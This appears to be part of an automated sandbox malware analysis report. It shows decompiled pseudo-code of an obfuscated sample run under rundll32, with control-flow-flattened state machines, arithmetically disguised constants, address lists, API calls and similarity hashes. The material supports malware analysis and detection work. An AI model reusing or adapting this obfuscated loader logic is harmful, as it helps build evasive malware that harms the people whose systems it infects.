                                                                                                                      				_v412 = _v412 ^ 0xff44de7f;
                                                                                                                      				_v412 = _v412 ^ 0xf11e2702;
                                                                                                                      				_v396 = 0xa6af25;
                                                                                                                      				_v396 = _v396 << 0x10;
                                                                                                                      				_v396 = _v396 >> 7;
                                                                                                                      				_v396 = _v396 + 0xffff7054;
                                                                                                                      				_v396 = _v396 ^ 0x015ec427;
                                                                                                                      				_v404 = 0x1f48c8;
                                                                                                                      				_t418 = 0x2d;
                                                                                                                      				_v404 = _v404 / _t418;
                                                                                                                      				_v404 = _v404 << 0xb;
                                                                                                                      				_v404 = _v404 | 0x7455ca98;
                                                                                                                      				_v404 = _v404 ^ 0x75da0b0a;
                                                                                                                      				_v368 = 0x174318;
                                                                                                                      				_v368 = _v368 + 0x805d;
                                                                                                                      				_v368 = _v368 ^ 0x0012ca04;
                                                                                                                      				_v408 = 0x579c92;
                                                                                                                      				_t419 = 0x65;
                                                                                                                      				_v408 = _v408 * 0x61;
                                                                                                                      				_v408 = _v408 ^ 0x6a2d4e62;
                                                                                                                      				_v408 = _v408 + 0xd9d0;
                                                                                                                      				_v408 = _v408 ^ 0x4b1c9053;
                                                                                                                      				_v392 = 0x2598b2;
                                                                                                                      				_v392 = _v392 * 0xd;
                                                                                                                      				_v392 = _v392 ^ 0xb79fc0d8;
                                                                                                                      				_v392 = _v392 + 0xffff9085;
                                                                                                                      				_v392 = _v392 ^ 0xb671271d;
                                                                                                                      				_v324 = 0x8734;
                                                                                                                      				_v324 = _v324 + 0xffff82f4;
                                                                                                                      				_v324 = _v324 ^ 0x000c0e93;
                                                                                                                      				_v332 = 0x81f499;
                                                                                                                      				_v332 = _v332 ^ 0xcb023f28;
                                                                                                                      				_v332 = _v332 ^ 0xcb8aeffa;
                                                                                                                      				_v340 = 0xbb3951;
                                                                                                                      				_v340 = _v340 ^ 0x050a1ed9;
                                                                                                                      				_v340 = _v340 ^ 0x05b74055;
                                                                                                                      				_v372 = 0x5c4d3f;
                                                                                                                      				_v372 = _v372 + 0xffffba18;
                                                                                                                      				_v372 = _v372 | 0xc0b40c25;
                                                                                                                      				_v372 = _v372 >> 3;
                                                                                                                      				_v372 = _v372 ^ 0x1815f0ae;
                                                                                                                      				_v380 = 0xe44e59;
                                                                                                                      				_v380 = _v380 + 0x7d25;
                                                                                                                      				_v380 = _v380 + 0xffff00c0;
                                                                                                                      				_v380 = _v380 << 0xa;
                                                                                                                      				_v380 = _v380 ^ 0x8f30862d;
                                                                                                                      				_v360 = 0x1cbdf;
                                                                                                                      				_v360 = _v360 + 0xffff6e4b;
                                                                                                                      				_v360 = _v360 >> 8;
                                                                                                                      				_v360 = _v360 ^ 0x0001cec6;
                                                                                                                      				_v348 = 0xf4499d;
                                                                                                                      				_v348 = _v348 + 0x832d;
                                                                                                                      				_v348 = _v348 << 2;
                                                                                                                      				_v348 = _v348 ^ 0x03dc7480;
                                                                                                                      				_v352 = 0x4c1d4a;
                                                                                                                      				_v352 = _v352 >> 0xd;
                                                                                                                      				_v352 = _v352 * 0xe;
                                                                                                                      				_v352 = _v352 ^ 0x0003e302;
                                                                                                                      				_v388 = 0x7e89b7;
                                                                                                                      				_v388 = _v388 / _t419;
                                                                                                                      				_t420 = 0x48;
                                                                                                                      				_v388 = _v388 / _t420;
                                                                                                                      				_t421 = 0x2b;
                                                                                                                      				_t414 = _v368;
                                                                                                                      				_v388 = _v388 / _t421;
                                                                                                                      				_v388 = _v388 ^ 0x000ed69e;
                                                                                                                      				_t422 = _v368;
                                                                                                                      				_v300 = 0xe9da01;
                                                                                                                      				_v300 = _v300 + 0xffffd878;
                                                                                                                      				_v300 = _v300 ^ 0x00eb5be0;
                                                                                                                      				_v336 = 0x6aaf6d;
                                                                                                                      				_v336 = _v336 * 0x22;
                                                                                                                      				_v336 = _v336 ^ 0x0e2b42a4;
                                                                                                                      				_v316 = 0x54d710;
                                                                                                                      				_v316 = _v316 >> 0xc;
                                                                                                                      				_v316 = _v316 ^ 0x0000014d;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t332 = 0x61250f6;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t427 = _t367 - _t332;
                                                                                                                      							if(_t427 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t427 == 0) {
                                                                                                                      								_t352 = E00690AE0(0x40, 1);
                                                                                                                      								_push(_v320);
                                                                                                                      								_push( &_v260);
                                                                                                                      								_push(_t352);
                                                                                                                      								_push(0xb);
                                                                                                                      								E006880E3(_v364, _v304);
                                                                                                                      								_t425 =  &(_t425[6]);
                                                                                                                      								_t367 = 0x97954ea;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t332 = 0x61250f6;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							if(_t367 == 0x2db8754) {
                                                                                                                      								E00698519(_v360, _v348, _v292);
                                                                                                                      								E00698519(_v352, _v388, _t422);
                                                                                                                      								E00698519(_v300, _v336, _v284);
                                                                                                                      								_t367 = _t414;
                                                                                                                      								L33:
                                                                                                                      								_t332 = 0x61250f6;
                                                                                                                      								goto L34;
                                                                                                                      							}
                                                                                                                      							if(_t367 == 0x349a1a2) {
                                                                                                                      								_t422 = 0;
                                                                                                                      								E00684B61( &_v260, 0x100, _v376, _v344);
                                                                                                                      								_v284 = _v284 & 0;
                                                                                                                      								_v280 = _v280 & 0;
                                                                                                                      								_v292 = _v292 & 0;
                                                                                                                      								_v288 = _v288 & 0;
                                                                                                                      								_t367 = 0xea9523f;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t332 = 0x61250f6;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							if(_t367 == 0x47b49b8) {
                                                                                                                      								if(_v288 >= _v316) {
                                                                                                                      									_t359 = E0069F435( &_v292,  &_v284);
                                                                                                                      								} else {
                                                                                                                      									_t359 = E0069A666( &_v292);
                                                                                                                      								}
                                                                                                                      								_t422 = _t359;
                                                                                                                      								_t332 = 0x61250f6;
                                                                                                                      								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t367 != 0x54d1846) {
                                                                                                                      								goto L34;
                                                                                                                      							}
                                                                                                                      							_t386 =  *0x6a3e08; // 0x0
                                                                                                                      							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
                                                                                                                      							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
                                                                                                                      							_t413 =  *((intOrPtr*)(_t386 + 0x14));
                                                                                                                      							 *((intOrPtr*)(_t386 + 4)) = _t361;
                                                                                                                      							if(_t361 == 0) {
                                                                                                                      								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
                                                                                                                      							}
                                                                                                                      							_t362 =  *0x6a3e08; // 0x0
                                                                                                                      							if(_t413 >=  *_t362) {
                                                                                                                      								_t387 =  *0x6a3e08; // 0x0
                                                                                                                      								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
                                                                                                                      								L37:
                                                                                                                      								return _t364;
                                                                                                                      							} else {
                                                                                                                      								_t367 = 0x349a1a2;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t332 = 0x61250f6;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t367 == 0x70f4b52) {
                                                                                                                      							E00698519(_v372, _v380, _v276);
                                                                                                                      							_t367 = 0x2db8754;
                                                                                                                      							goto L33;
                                                                                                                      						}
                                                                                                                      						if(_t367 == 0x97954ea) {
                                                                                                                      							_t335 =  *0x6a3e08; // 0x0
                                                                                                                      							_t338 =  *0x6a3e08; // 0x0
                                                                                                                      							_t343 =  *0x6a3e08; // 0x0
                                                                                                                      							_t345 = E0069E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
                                                                                                                      							_t425 =  &(_t425[0xb]);
                                                                                                                      							if(_t345 == 0) {
                                                                                                                      								_t414 = 0x54d1846;
                                                                                                                      								_t367 = 0x2db8754;
                                                                                                                      							} else {
                                                                                                                      								_t367 = 0xcdb2e90;
                                                                                                                      							}
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								_t332 = 0x61250f6;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t367 == 0xcdb2e90) {
                                                                                                                      							_t347 = E00685548(_v324, _a24, _v332, _v340,  &_v276);
                                                                                                                      							_t425 =  &(_t425[4]);
                                                                                                                      							if(_t347 == 0) {
                                                                                                                      								_t414 = 0x54d1846;
                                                                                                                      							} else {
                                                                                                                      								_t414 = 0xa80516a;
                                                                                                                      								_t364 = 1;
                                                                                                                      							}
                                                                                                                      							_t367 = 0x70f4b52;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								_t332 = 0x61250f6;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t367 != 0xea9523f) {
                                                                                                                      							goto L34;
                                                                                                                      						}
                                                                                                                      						_t349 = E0068CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
                                                                                                                      						_t425 =  &(_t425[5]);
                                                                                                                      						if(_t349 == 0) {
                                                                                                                      							goto L37;
                                                                                                                      						}
                                                                                                                      						_t367 = 0x47b49b8;
                                                                                                                      						goto L1;
                                                                                                                      						L34:
                                                                                                                      					} while (_t367 != 0xa80516a);
                                                                                                                      					goto L37;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x0068692f
                                                                                                                      0x00686a16
                                                                                                                      0x00686a25
                                                                                                                      0x00686a3d
                                                                                                                      0x00686a43
                                                                                                                      0x00686bc8
                                                                                                                      0x00686bc8
                                                                                                                      0x00000000
                                                                                                                      0x00686bc8
                                                                                                                      0x0068693b
                                                                                                                      0x006869d8
                                                                                                                      0x006869da
                                                                                                                      0x006869df
                                                                                                                      0x006869e6
                                                                                                                      0x006869ed
                                                                                                                      0x006869f4
                                                                                                                      0x006869fd
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686947
                                                                                                                      0x00686999
                                                                                                                      0x006869a9
                                                                                                                      0x0068699b
                                                                                                                      0x0068699b
                                                                                                                      0x0068699b
                                                                                                                      0x006869ae
                                                                                                                      0x006869b7
                                                                                                                      0x006869bc
                                                                                                                      0x00000000
                                                                                                                      0x006869bc
                                                                                                                      0x0068694f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686955
                                                                                                                      0x0068695e
                                                                                                                      0x00686960
                                                                                                                      0x00686963
                                                                                                                      0x00686966
                                                                                                                      0x0068696b
                                                                                                                      0x00686970
                                                                                                                      0x00686970
                                                                                                                      0x00686973
                                                                                                                      0x0068697a
                                                                                                                      0x00686bdb
                                                                                                                      0x00686be1
                                                                                                                      0x00686be8
                                                                                                                      0x00686bf1
                                                                                                                      0x00686980
                                                                                                                      0x00686980
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x0068697a
                                                                                                                      0x00686a8d
                                                                                                                      0x00686bbd
                                                                                                                      0x00686bc3
                                                                                                                      0x00000000
                                                                                                                      0x00686bc3
                                                                                                                      0x00686a99
                                                                                                                      0x00686b34
                                                                                                                      0x00686b4c
                                                                                                                      0x00686b7d
                                                                                                                      0x00686b89
                                                                                                                      0x00686b8e
                                                                                                                      0x00686b93
                                                                                                                      0x00686b9f
                                                                                                                      0x00686ba4
                                                                                                                      0x00686b95
                                                                                                                      0x00686b95
                                                                                                                      0x00686b95
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686aa5
                                                                                                                      0x00686b0f
                                                                                                                      0x00686b14
                                                                                                                      0x00686b19
                                                                                                                      0x00686b25
                                                                                                                      0x00686b1b
                                                                                                                      0x00686b1d
                                                                                                                      0x00686b22
                                                                                                                      0x00686b22
                                                                                                                      0x00686b2a
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686aad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686ad6
                                                                                                                      0x00686adb
                                                                                                                      0x00686ae0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686ae6
                                                                                                                      0x00000000
                                                                                                                      0x00686bcd
                                                                                                                      0x00686bcd
                                                                                                                      0x00000000
                                                                                                                      0x00686bd9

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                      • API String ID: 0-2895984816
                                                                                                                      • Opcode ID: 00bd626cfd7b9d7f381bb233a094662793ed5db2f6d4824226ee4a7bac8140a9
                                                                                                                      • Instruction ID: 241f313926b4e872476352d0ee0cef08e55cecd4ec62ebf9dffa3bb992bb18d1
                                                                                                                      • Opcode Fuzzy Hash: 00bd626cfd7b9d7f381bb233a094662793ed5db2f6d4824226ee4a7bac8140a9
                                                                                                                      • Instruction Fuzzy Hash: D30256715083819FC7A8DF65C585A5BBBE2FBC4318F208A0DF5DA86260C7B4D949CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3249967234-0
                                                                                                                      • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                      • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                      • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                      • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00685E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				void* _t339;
                                                                                                                      				intOrPtr _t372;
                                                                                                                      				void* _t374;
                                                                                                                      				intOrPtr _t381;
                                                                                                                      				intOrPtr _t382;
                                                                                                                      				void* _t384;
                                                                                                                      				intOrPtr* _t385;
                                                                                                                      				void* _t387;
                                                                                                                      				intOrPtr _t421;
                                                                                                                      				intOrPtr* _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t428;
                                                                                                                      				signed int _t429;
                                                                                                                      				signed int _t430;
                                                                                                                      				signed int _t431;
                                                                                                                      				signed int _t432;
                                                                                                                      				signed int _t433;
                                                                                                                      				signed int _t434;
                                                                                                                      				signed int* _t437;
                                                                                                                      
                                                                                                                      				_t385 = _a8;
                                                                                                                      				_push(_t385);
                                                                                                                      				_push(_a4);
                                                                                                                      				_t423 = __ecx;
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t339);
                                                                                                                      				_v12 = 0xbcdf6a;
                                                                                                                      				_t437 =  &(( &_v148)[4]);
                                                                                                                      				_t421 = 0;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_t387 = 0xc04f77e;
                                                                                                                      				_v92 = 0x11f6ef;
                                                                                                                      				_v92 = _v92 + 0xffffb184;
                                                                                                                      				_t424 = 0x71;
                                                                                                                      				_v92 = _v92 / _t424;
                                                                                                                      				_t425 = 0x24;
                                                                                                                      				_v92 = _v92 / _t425;
                                                                                                                      				_v92 = _v92 ^ 0x0000011d;
                                                                                                                      				_v56 = 0xfaa796;
                                                                                                                      				_v56 = _v56 >> 0xc;
                                                                                                                      				_v56 = _v56 << 0xa;
                                                                                                                      				_v56 = _v56 ^ 0x003ea801;
                                                                                                                      				_v36 = 0x1650e4;
                                                                                                                      				_v36 = _v36 + 0xce7;
                                                                                                                      				_v36 = _v36 ^ 0x00165dcb;
                                                                                                                      				_v116 = 0x54bb44;
                                                                                                                      				_v116 = _v116 + 0xffff1cdd;
                                                                                                                      				_v116 = _v116 + 0xffffa99d;
                                                                                                                      				_v116 = _v116 + 0xa8e5;
                                                                                                                      				_v116 = _v116 ^ 0x00542aa3;
                                                                                                                      				_v148 = 0xce1ee6;
                                                                                                                      				_v148 = _v148 ^ 0xff8bbe67;
                                                                                                                      				_v148 = _v148 | 0x521cb43f;
                                                                                                                      				_v148 = _v148 << 1;
                                                                                                                      				_v148 = _v148 ^ 0xfebb697e;
                                                                                                                      				_v52 = 0xc2bf1c;
                                                                                                                      				_v52 = _v52 << 0xc;
                                                                                                                      				_t426 = 0x73;
                                                                                                                      				_v52 = _v52 / _t426;
                                                                                                                      				_v52 = _v52 ^ 0x0061d2eb;
                                                                                                                      				_v88 = 0x8d6fba;
                                                                                                                      				_v88 = _v88 * 0x6a;
                                                                                                                      				_v88 = _v88 * 0x21;
                                                                                                                      				_v88 = _v88 >> 0xb;
                                                                                                                      				_v88 = _v88 ^ 0x00119314;
                                                                                                                      				_v48 = 0xec8dbc;
                                                                                                                      				_v48 = _v48 + 0xffff0a61;
                                                                                                                      				_v48 = _v48 | 0x0a9d8147;
                                                                                                                      				_v48 = _v48 ^ 0x0affcc17;
                                                                                                                      				_v24 = 0xd16d2c;
                                                                                                                      				_v24 = _v24 >> 2;
                                                                                                                      				_v24 = _v24 ^ 0x003dd5e6;
                                                                                                                      				_v124 = 0xaffa28;
                                                                                                                      				_v124 = _v124 >> 9;
                                                                                                                      				_v124 = _v124 * 9;
                                                                                                                      				_v124 = _v124 ^ 0x3775f33c;
                                                                                                                      				_v124 = _v124 ^ 0x377a4e54;
                                                                                                                      				_v76 = 0x9eb952;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 << 0xa;
                                                                                                                      				_v76 = _v76 ^ 0x00160abd;
                                                                                                                      				_v108 = 0x8bec79;
                                                                                                                      				_t427 = 0x28;
                                                                                                                      				_v108 = _v108 * 0x30;
                                                                                                                      				_v108 = _v108 + 0xffff86d5;
                                                                                                                      				_v108 = _v108 + 0xffff5405;
                                                                                                                      				_v108 = _v108 ^ 0x1a3a719b;
                                                                                                                      				_v132 = 0x74267e;
                                                                                                                      				_v132 = _v132 + 0x1b76;
                                                                                                                      				_v132 = _v132 << 4;
                                                                                                                      				_v132 = _v132 + 0xffff1414;
                                                                                                                      				_v132 = _v132 ^ 0x074c11a2;
                                                                                                                      				_v100 = 0x4236e1;
                                                                                                                      				_v100 = _v100 ^ 0x96e608d5;
                                                                                                                      				_v100 = _v100 / _t427;
                                                                                                                      				_t428 = 0x2d;
                                                                                                                      				_v100 = _v100 * 0x6c;
                                                                                                                      				_v100 = _v100 ^ 0x96bd808a;
                                                                                                                      				_v84 = 0xb83730;
                                                                                                                      				_v84 = _v84 + 0xffffd15d;
                                                                                                                      				_v84 = _v84 >> 0xb;
                                                                                                                      				_v84 = _v84 ^ 0x0009ec33;
                                                                                                                      				_v140 = 0x532b06;
                                                                                                                      				_v140 = _v140 ^ 0xb0124270;
                                                                                                                      				_v140 = _v140 << 1;
                                                                                                                      				_v140 = _v140 / _t428;
                                                                                                                      				_v140 = _v140 ^ 0x02279f8d;
                                                                                                                      				_v44 = 0x33dfa;
                                                                                                                      				_v44 = _v44 + 0x1c37;
                                                                                                                      				_v44 = _v44 ^ 0x000817ba;
                                                                                                                      				_v136 = 0x1bf887;
                                                                                                                      				_v136 = _v136 ^ 0x189cf430;
                                                                                                                      				_v136 = _v136 + 0xffff0896;
                                                                                                                      				_v136 = _v136 ^ 0xf213b32f;
                                                                                                                      				_v136 = _v136 ^ 0xea9313b1;
                                                                                                                      				_v144 = 0xffa314;
                                                                                                                      				_v144 = _v144 >> 7;
                                                                                                                      				_v144 = _v144 ^ 0x35f9e2de;
                                                                                                                      				_t429 = 0x1f;
                                                                                                                      				_v144 = _v144 * 0x5b;
                                                                                                                      				_v144 = _v144 ^ 0x2f3e99d8;
                                                                                                                      				_v68 = 0x41f910;
                                                                                                                      				_v68 = _v68 / _t429;
                                                                                                                      				_v68 = _v68 ^ 0x28681de5;
                                                                                                                      				_v68 = _v68 ^ 0x2865ac71;
                                                                                                                      				_v96 = 0x6e33;
                                                                                                                      				_v96 = _v96 << 4;
                                                                                                                      				_v96 = _v96 ^ 0xe7b8475a;
                                                                                                                      				_v96 = _v96 << 1;
                                                                                                                      				_v96 = _v96 ^ 0xcf7b3a2b;
                                                                                                                      				_v104 = 0xedfca3;
                                                                                                                      				_t430 = 0x5e;
                                                                                                                      				_v104 = _v104 * 0x5f;
                                                                                                                      				_v104 = _v104 | 0x0b07679d;
                                                                                                                      				_v104 = _v104 ^ 0xc050dc4c;
                                                                                                                      				_v104 = _v104 ^ 0x9b058770;
                                                                                                                      				_v112 = 0xe25509;
                                                                                                                      				_v112 = _v112 ^ 0xf6d0fdca;
                                                                                                                      				_v112 = _v112 / _t430;
                                                                                                                      				_v112 = _v112 ^ 0x02984cdf;
                                                                                                                      				_v40 = 0xf7137d;
                                                                                                                      				_v40 = _v40 << 8;
                                                                                                                      				_v40 = _v40 ^ 0xf71f8dee;
                                                                                                                      				_v64 = 0x5508e8;
                                                                                                                      				_v64 = _v64 << 4;
                                                                                                                      				_v64 = _v64 | 0x94c676b5;
                                                                                                                      				_v64 = _v64 ^ 0x95dffb87;
                                                                                                                      				_v120 = 0xc732ae;
                                                                                                                      				_t431 = 0x75;
                                                                                                                      				_v120 = _v120 / _t431;
                                                                                                                      				_v120 = _v120 << 7;
                                                                                                                      				_t432 = 0x2c;
                                                                                                                      				_v120 = _v120 / _t432;
                                                                                                                      				_v120 = _v120 ^ 0x000601dd;
                                                                                                                      				_v72 = 0x179b9;
                                                                                                                      				_v72 = _v72 >> 1;
                                                                                                                      				_v72 = _v72 << 0xb;
                                                                                                                      				_v72 = _v72 ^ 0x05ec7a60;
                                                                                                                      				_v28 = 0x46261b;
                                                                                                                      				_t433 = 0x35;
                                                                                                                      				_v28 = _v28 / _t433;
                                                                                                                      				_v28 = _v28 ^ 0x000e773f;
                                                                                                                      				_v128 = 0xfd046c;
                                                                                                                      				_v128 = _v128 << 1;
                                                                                                                      				_v128 = _v128 << 3;
                                                                                                                      				_v128 = _v128 + 0xffff42a9;
                                                                                                                      				_v128 = _v128 ^ 0x0fc89804;
                                                                                                                      				_v60 = 0xb39cb2;
                                                                                                                      				_v60 = _v60 + 0xffffa360;
                                                                                                                      				_v60 = _v60 ^ 0x6e5a7866;
                                                                                                                      				_v60 = _v60 ^ 0x6eef17c9;
                                                                                                                      				_v32 = 0xb015d5;
                                                                                                                      				_t434 = 0x33;
                                                                                                                      				_v32 = _v32 / _t434;
                                                                                                                      				_v32 = _v32 ^ 0x00082471;
                                                                                                                      				_v80 = 0x87b3ae;
                                                                                                                      				_v80 = _v80 + 0xffffe530;
                                                                                                                      				_v80 = _v80 << 2;
                                                                                                                      				_v80 = _v80 ^ 0x021b575c;
                                                                                                                      				while(_t387 != 0x5e373ec) {
                                                                                                                      					if(_t387 == 0x87b20b3) {
                                                                                                                      						_t372 =  *0x6a3dfc; // 0x0
                                                                                                                      						_t374 = E0068CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
                                                                                                                      						_t437 =  &(_t437[0x12]);
                                                                                                                      						if(_t374 == _v88) {
                                                                                                                      							 *_t385 = _v20;
                                                                                                                      							_t421 = 1;
                                                                                                                      							 *((intOrPtr*)(_t385 + 4)) = _v16;
                                                                                                                      						} else {
                                                                                                                      							_t387 = 0x5e373ec;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t387 == 0xc04f77e) {
                                                                                                                      							_t387 = 0xd382560;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t387 == 0xc68a5f7) {
                                                                                                                      								_push(_t387);
                                                                                                                      								_push(_t387);
                                                                                                                      								_t381 = E00687FF2(_v16);
                                                                                                                      								_v20 = _t381;
                                                                                                                      								if(_t381 != 0) {
                                                                                                                      									_t387 = 0x87b20b3;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t387 != 0xd382560) {
                                                                                                                      									L14:
                                                                                                                      									if(_t387 != 0x4d23f0b) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t382 =  *0x6a3dfc; // 0x0
                                                                                                                      									_t384 = E0068CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
                                                                                                                      									_t437 =  &(_t437[0x12]);
                                                                                                                      									if(_t384 == _v148) {
                                                                                                                      										_t387 = 0xc68a5f7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t421;
                                                                                                                      				}
